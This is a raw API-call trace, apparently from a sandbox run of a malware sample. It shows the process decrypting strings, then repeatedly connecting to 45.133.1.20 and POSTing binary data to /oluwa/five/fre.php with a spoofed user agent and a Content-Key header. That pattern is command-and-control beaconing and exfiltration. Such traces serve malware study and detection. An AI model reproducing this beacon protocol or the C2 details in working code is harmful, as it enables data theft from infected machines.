[0250.247] GetProcessHeap () returned 0x6a0000 [0250.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0250.247] GetProcessHeap () returned 0x6a0000 [0250.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.248] GetProcessHeap () returned 0x6a0000 [0250.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0250.248] GetProcessHeap () returned 0x6a0000 [0250.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0250.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1564) returned 0x834 [0250.251] Sleep (dwMilliseconds=0xea60) [0250.267] GetProcessHeap () returned 0x6a0000 [0250.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0250.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.270] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0250.313] GetProcessHeap () returned 0x6a0000 [0250.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.314] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0250.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.316] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.317] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.317] GetProcessHeap () returned 0x6a0000 [0250.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.319] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0250.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.320] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0250.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.322] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0250.322] GetProcessHeap () returned 0x6a0000 [0250.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.323] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.324] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.326] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.327] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.327] GetProcessHeap () returned 0x6a0000 [0250.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0250.327] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.328] GetProcessHeap () returned 0x6a0000 [0250.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0250.328] GetProcessHeap () returned 0x6a0000 [0250.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.329] GetProcessHeap () returned 0x6a0000 [0250.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0250.329] GetProcessHeap () returned 0x6a0000 [0250.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0250.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.330] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.340] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0250.352] GetProcessHeap () returned 0x6a0000 [0250.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.353] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0250.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.357] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.359] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.359] GetProcessHeap () returned 0x6a0000 [0250.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.360] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0250.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.362] CryptDestroyKey (hKey=0x6ad020) returned 1 [0250.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.363] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0250.363] GetProcessHeap () returned 0x6a0000 [0250.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.364] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0250.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.365] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0250.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.366] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0250.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.367] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0250.367] GetProcessHeap () returned 0x6a0000 [0250.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0250.367] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0250.367] GetProcessHeap () returned 0x6a0000 [0250.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0250.367] socket (af=2, type=1, protocol=6) returned 0x838 [0250.368] connect (s=0x838, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0250.394] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0250.394] GetProcessHeap () returned 0x6a0000 [0250.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0250.395] GetProcessHeap () returned 0x6a0000 [0250.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0250.395] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.396] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.396] GetProcessHeap () returned 0x6a0000 [0250.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c47f8 [0250.396] GetProcessHeap () returned 0x6a0000 [0250.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.397] GetProcessHeap () returned 0x6a0000 [0250.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0250.397] GetProcessHeap () returned 0x6a0000 [0250.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0250.398] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.399] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.399] GetProcessHeap () returned 0x6a0000 [0250.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0250.399] GetProcessHeap () returned 0x6a0000 [0250.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.399] send (s=0x838, buf=0x6bd460*, len=242, flags=0) returned 242 [0250.400] send (s=0x838, buf=0x6bb998*, len=159, flags=0) returned 159 [0250.400] GetProcessHeap () returned 0x6a0000 [0250.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0250.400] recv (in: s=0x838, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0250.500] GetProcessHeap () returned 0x6a0000 [0250.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0250.501] GetProcessHeap () returned 0x6a0000 [0250.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0250.502] GetProcessHeap () returned 0x6a0000 [0250.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c47f8 | out: hHeap=0x6a0000) returned 1 [0250.503] GetProcessHeap () returned 0x6a0000 [0250.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0250.503] closesocket (s=0x838) returned 0 [0250.504] GetProcessHeap () returned 0x6a0000 [0250.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0250.504] GetProcessHeap () returned 0x6a0000 [0250.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.504] GetProcessHeap () returned 0x6a0000 [0250.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0250.504] GetProcessHeap () returned 0x6a0000 [0250.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0250.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1568) returned 0x838 [0250.507] Sleep (dwMilliseconds=0xea60) [0250.508] GetProcessHeap () returned 0x6a0000 [0250.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0250.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0250.529] GetProcessHeap () returned 0x6a0000 [0250.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c6960 [0250.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.530] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c6960, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0250.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.531] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.532] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.532] GetProcessHeap () returned 0x6a0000 [0250.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6960 | out: hHeap=0x6a0000) returned 1 [0250.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.534] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0250.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.534] CryptDestroyKey (hKey=0x6ad020) returned 1 [0250.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.535] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0250.535] GetProcessHeap () returned 0x6a0000 [0250.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.536] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.537] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.538] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.539] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.545] GetProcessHeap () returned 0x6a0000 [0250.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0250.546] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.546] GetProcessHeap () returned 0x6a0000 [0250.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0250.547] GetProcessHeap () returned 0x6a0000 [0250.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.547] GetProcessHeap () returned 0x6a0000 [0250.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0250.548] GetProcessHeap () returned 0x6a0000 [0250.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0250.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0250.569] GetProcessHeap () returned 0x6a0000 [0250.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.571] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0250.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.572] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.573] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.573] GetProcessHeap () returned 0x6a0000 [0250.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.574] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0250.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.576] CryptDestroyKey (hKey=0x6ad520) returned 1 [0250.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.577] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0250.577] GetProcessHeap () returned 0x6a0000 [0250.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0250.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.579] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0250.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.581] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0250.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.582] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0250.582] GetProcessHeap () returned 0x6a0000 [0250.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0250.582] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0250.582] GetProcessHeap () returned 0x6a0000 [0250.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0250.582] socket (af=2, type=1, protocol=6) returned 0x83c [0250.583] connect (s=0x83c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0250.605] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0250.605] GetProcessHeap () returned 0x6a0000 [0250.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0250.605] GetProcessHeap () returned 0x6a0000 [0250.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0250.606] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.607] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.607] GetProcessHeap () returned 0x6a0000 [0250.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5638 [0250.607] GetProcessHeap () returned 0x6a0000 [0250.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.608] GetProcessHeap () returned 0x6a0000 [0250.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0250.608] GetProcessHeap () returned 0x6a0000 [0250.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0250.609] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.610] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.610] GetProcessHeap () returned 0x6a0000 [0250.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0250.610] GetProcessHeap () returned 0x6a0000 [0250.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.611] send (s=0x83c, buf=0x6bd460*, len=242, flags=0) returned 242 [0250.611] send (s=0x83c, buf=0x6bb998*, len=159, flags=0) returned 159 [0250.611] GetProcessHeap () returned 0x6a0000 [0250.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0250.612] recv (in: s=0x83c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0250.680] GetProcessHeap () returned 0x6a0000 [0250.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0250.681] GetProcessHeap () returned 0x6a0000 [0250.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0250.681] GetProcessHeap () returned 0x6a0000 [0250.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5638 | out: hHeap=0x6a0000) returned 1 [0250.682] GetProcessHeap () returned 0x6a0000 [0250.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0250.682] closesocket (s=0x83c) returned 0 [0250.683] GetProcessHeap () returned 0x6a0000 [0250.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0250.683] GetProcessHeap () returned 0x6a0000 [0250.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.683] GetProcessHeap () returned 0x6a0000 [0250.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0250.684] GetProcessHeap () returned 0x6a0000 [0250.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0250.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x156c) returned 0x83c [0250.687] Sleep (dwMilliseconds=0xea60) [0250.688] GetProcessHeap () returned 0x6a0000 